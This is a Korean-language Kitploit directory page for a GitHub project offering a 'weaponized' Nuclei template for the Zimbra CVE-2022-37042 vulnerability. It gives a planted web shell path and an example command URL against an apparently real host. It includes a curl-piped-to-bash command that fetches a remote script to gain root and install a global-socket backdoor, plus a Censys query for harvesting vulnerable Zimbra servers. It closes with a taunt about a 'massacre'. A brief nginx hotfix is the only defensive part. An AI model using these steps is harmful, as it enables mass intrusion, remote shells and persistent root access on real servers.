Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2022-37042 — Zimbra CVE-2022-37042 Nuclei weaponized template | Kitploit
도구/GitHubGitHub/aels/cve-2022-37042
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlPayload Development
GitHubaels/cve-2022-37042

CVE-2022-37042

Zimbra CVE-2022-37042 Nuclei weaponized template

저장소 보기
18113년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2022-37042

image

Zimbra CVE-2022-37042 Nuclei 무기화 템플릿

셸 경로: /public/formatter.jsp

Nuclei 자체: https://github.com/projectdiscovery/nuclei

셸에는 불투명도 0인 숨겨진 입력이 있으므로 마우스를 올리기만 하면 명령을 입력한 후 [Enter] 키를 누르면 됩니다:

image

예시 셸 URL:

root@kitploit:~
https://ms1.fission.com:8443/public/formatter.jsp?cmd=id

CVE-2022-37042 핫픽스: 감염된 서버 패치

다음 명령을 실행하세요 (한 번만):

root@kitploit:~
cd /opt/zimbra/conf/nginx/templates/; sed -i 's|location ~\* \^/zmerror_|location = /service/extension/backup/mboximport { return 403; }\n    location ~\* \^/zmerror_|' nginx.conf.web.http*; /opt/zimbra/bin/zmproxyctl restart;

Nginx가 아닌 Apache를 사용하는 서버에는 추가 코드가 필요합니다. Pull Request를 환영합니다.

Zimbra zimbslap을 통한 자동 루트 획득

root@kitploit:~
curl -fskSL raw.githubusercontent.com/aels/zimbra-slapper/main/slapper.sh | bash 2>&1

이 명령은 global-socket (https://www.gsocket.io/deploy/)을 설치하고 루트로 접속할 수 있는 키를 제공합니다.

Zimbra IP 수집

https://search.censys.io/search?resource=hosts&sort=RELEVANCE&per_page=100&virtual_hosts=EXCLUDE&q=services.http.response.html_tags%3A+%22%3Ctitle%3EZimbra+Web+Client+Sign+In%22

생일 축하 학살, 이 놈들아 ;)

도구 다운로드